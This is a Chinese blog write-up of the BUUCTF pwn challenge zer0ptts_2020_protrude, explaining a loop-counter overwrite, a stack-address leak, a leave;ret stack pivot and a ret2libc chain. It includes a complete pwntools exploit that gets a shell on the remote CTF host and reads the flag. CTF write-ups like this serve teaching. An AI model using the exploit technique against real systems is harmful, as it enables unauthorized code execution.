[BUUCTF-pwn] zer0ptts_2020_protrude

最新推荐文章于 2024-09-11 10:53:21 发布
最新推荐文章于 2024-09-11 10:53:21 发布
阅读量163 收藏
点赞数
分类专栏: CTF pwn 文章标签: 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121087578
版权

程序允许最多输入22个数,先输入个数再逐个输入数字,当输入到num[15]时输入0会到2重新开始,这里存的是for(i=0;i<n;i++)里的i,这种情况在pwn题里还是比较常见的。通过覆盖这个计数器可以路过不该覆盖的位置。

  1. 22个数正好覆盖到return位置
  2. 程序main和calc_sum都只运行一次没有循环,所以每次都要覆盖return来实现重复输入
  3. 两次输入不同的值计算差得到栈地址(15前是固定的无法跳过,一个跳到rbp覆盖为0一个不覆盖即可得到rbp,但两次rbp的偏移需要减差)

步骤:

  1. 在【15】处输入20直接跳到ret覆盖为_start 
  2. 在【15】处输入19直接跳到rbp,覆盖rbp,ret为0,_start 
  3. 计算差得到栈地址
  4. 输入rop(pop_rdi_ret,got.puts,plt.puts,_start),输入18跳到 rbp输入栈地址(num[0]处)+leave_ret移栈
  5. 执行rop输入got表得到libc并返回start(这里有个坑,题目并未调用过puts,本来使用printf但远程printf无输出)
  6. 直接在ret处写one_gadget或者像上步一样写rop移栈
from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF("/home/shi/pwn/libc6_2.23/libc-2.23.so")
    one = [0x45226, 0x4527a, 0xf0364, 0xf1207 ]
    libc_start_main_ret = 0x20840
else:
    p = remote('node4.buuoj.cn', 28427) 
    libc_elf = ELF('../libc6_2.23-0ubuntu10_amd64.so')
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
    libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context(arch='amd64') #, log_level='debug'

def calc_sum(n,payload):
    p.sendlineafter(b"n = ", str(n).encode())
    for i in payload:
        p.sendlineafter(b'] = ', str(i).encode())
    p.recvuntil(b'SUM = ')
    return int(p.recvline()[:-1])

start    = elf.sym['_start']
payload = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,start]
sum1 = calc_sum(22,payload)

payload = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,17,0,0,0,start]
sum2 = calc_sum(22,payload)

stack = sum1-sum2 - 0xe0 - (0x740-0x4d0)
pop_rdi   = 0x0000000000400a83 # pop rdi ; ret
leave_ret = 0x0000000000400849 # leave ; ret

payload = [0,pop_rdi,elf.got['puts'],elf.plt['puts'],start,0,0,0,0,0,0,0,0,0,19,stack,leave_ret]
sum2 = calc_sum(22,payload)

libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - libc_elf.sym['puts']
system = libc_base + libc_elf.sym['system']
bin_sh = libc_base + next(libc_elf.search(b'/bin/sh'))
one_gadget = libc_base + one[1]
print('libc:', hex(libc_base))
payload = [0,pop_rdi,bin_sh,system,0,0,0,0,0,0,0,0,0,0,19,stack-0x160,leave_ret]
#payload = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,one_gadget]
sum2 = calc_sum(22,payload)

p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
专栏目录
Zer0pts CTF 2020的web赛后记录+复现环境
蚁景网安学院
05-28 1699
May 2020Zer0pts CTF 2020的web赛后记录前言打了Zer0pts CTF 2020感觉题目不错就总结一下。复现环境地址:https://gitlab.com/z...
[BUUCTF][Zer0pts2020]Can you guess it?
Y4tacker的博客
10-03 4693
文章目录前置知识一些学到的新函数与新变量新变量属性-PHP_SELF新php函数-basenamebasename broken with non-ASCII-charsWP部分 前置知识 一些学到的新函数与新变量 新变量属性-PHP_SELF $_SERVER['PHP_SELF'] 表示当前 php 文件相对于网站根目录的位置地址,与 document root 相关 下面是本地测试截图,也就是http://.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'] 新ph
BUUCTF-PWN】4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 375
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
BUUCTF|PWN-pwn1_sctf_2016
Rt1Text的博客
04-23 609
1.checksec+运行 32位+NX保护
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 984
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4080
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF-PWN gyctf_2020_bfnote(劫持TLS结构,ret2_dl_runtime_resolve)
weixin_44145820的博客
04-19 1626
目录程序分析背景知识延迟绑定Canary漏洞利用Exp 程序分析 一道带有canary的栈溢出题目 main函数是吧ebp-4中存放地址再减四获得的 调试结果如下 背景知识 延迟绑定 本题需要利用ret2al_runtime_resolve,涉及到延迟绑定的技术,简单介绍一下函数绑定的过程,以atol的调用为例 我们看一下第一次调用程序atol,此时atol_got存放着atol@plt+6...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF------mrctf2020_easyoverflow
qq_33010875的博客
10-08 353
环境:WSL2,ubuntu16.04,python2 checksec文件: 拖入ida分析: main函数中就有system(‘bin/sh’),只要check函数的返回值为1即可执行 查看check函数: 只要a1和fake_flag相等,函数就能返回1 a1就是main函数里的v5,值为:ju3t_@_f@k3_f1@g fake_flag的值为:n0t_r3@11y_f1@g 只要将v5的值覆盖为n0t_r3@11y_f1@g即可 main函数中有get函数可用, v4: v4是var_
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 758
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
注册安全分析报告:熊猫频道
Explinks的博客
09-10 541
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
第146天:内网安全-Web权限维持&各语言内存马&Servlet-api类&Spring类&Agent类
weixin_71529930的博客
09-10 997
然后访问http://ip/,这里会卡住,把之前创建的index文件会被删除,后面的页面是我访问的缓存,同时会产生一个.HH.php文件,这个文件是linux的隐藏文件,但是不知为何,我linux搭建的访问不了,只能这样演示。在我去删除的时候,他又会立刻去创建出来,甚至在我鼠标右键的时候因为这个文件不断地创建,右键页面也不能打开,从时间也可以看出来这个文件,在一直的刷新。后面换成了小迪视频里面的冰蝎版本,视频中问题是木马不能再Upload目录下,这里我试了也不行,所以这个还是有很多的bug的。
首个大模型供应链安全领域的国际标准,WDTA《大模型供应链安全要求》标准解读
银行信息系统应用架构导论
09-10 235
大模型供应链安全要求》标准通过提供供应链各个层面的安全管理要求,为组织构建更加安全的AI生态系统提供了明确的指导。这些模型在带来创新和便利的同时,也伴随着安全风险的增加。《大模型供应链安全要求》提出了大型语言模型(LLMs)的供应链安全保护框架,提出了管理LLMs开发、运营和维护(O&M)中涉及的供应链安全风险和供应活动的要求,并提供了常见的供应链安全风险和典型安全案例等相关信息。对供应商进行严格的选择和持续评估,确保其提供的产品和服务的真实性、完整性和准确性,并防止信息在供应链中被篡改或泄露。
Web3 项目安全手册
2301_76786857的博客
09-10 303
现如今针对 Web3 项目的攻击手法层出不穷,且项目之间的交互也越发复杂,在各个项目之间的交互经常会引入新的安全问题,而大部分 Web3 项目研发团队普遍缺少的一线的安全攻防经验,并且在进行 Web3 项目研发的时候,重点关注的是项目整体的商业论证以及业务功能的实现,而没有更多的精力完成安全体系的建设。通常项目方团队为了确保 Web3 项目的安全会聘请优秀的区块链安全团队对其代码进行安全审计,但是区块链安全团队的审计仅仅是短期的引导,并不能让项目方团队建立属于自己的安全体系。
【绿盟科技盟管家-注册/登录安全分析报告】
09-10 1261
绿盟科技应用互联网技术启动“盟管家”服务模式。通过全方位的数据集成平台,实现信息互通、化繁为简。已注册用户可实时了解Case处理进度及情况,帮助客户智能化判断紧急漏洞、设备版本,实时提供风险预警、升级提醒等。作为老牌安全头部科技公司, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“
消防指挥中心控制台:守护安全的关键枢纽
最新发布
JiaDeLi_console的博客
09-11 311
它不仅是信息的接收者,更是行动的发起者,协调各方资源,确保消防救援工作高效、有序地进行。消防指挥中心控制台是消防救援工作的关键环节,它以先进的设计、强大的功能和不断升级的科技,为守护人民生命财产安全发挥着不可替代的作用。在未来,随着科技的进一步发展,相信消防指挥中心控制台将变得更加智能、高效,为构建更加安全的社会环境贡献更大的力量。同时,控制台还配备了舒适的座椅,为指挥人员提供良好的工作条件。在消防应急救援的战场上,嘉德立消防指挥中心控制台犹如一座坚实的堡垒,发挥着至关重要的作用。二、先进的设计与功能。
Java安全-动态加载字节码
柠檬i的博客
09-07 1224
众所周知,不同平台、不通CPU的计算机指令有差异,但因为Java是一门跨平台的编译型语言,所以这些差异对于上层开发者来说是透明的,上层开发者只需要将自己的代码编译一次,即可运行在不同平台的JVM虚拟机中。
EAC认证—技术护照、安全论证和使用说明编制要求
liamjiangmingyao的博客
09-10 320
安全论证是海关联盟认证TR CU 010“机械和设备安全”和TR CU 032“超压设备安全”中的强制性文件,制造商(证书申请人)必须向认证机构提交该文件。3.机械和/或设备的使用说明以及使用机械和/或设备时应遵守的安全措施,包括调试、正确操作和维护、任何维修、定期诊断、测试、运输、包装和储存方法以及储存条件。5.在规定的使用寿命(规定的资源、寿命等)结束时,机器和/或设备必须停止使用,并且必须做出维修、处置、检查和重新使用的决定。10.调试、使用和回收阶段的安全相关信息的收集和分析要求。
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值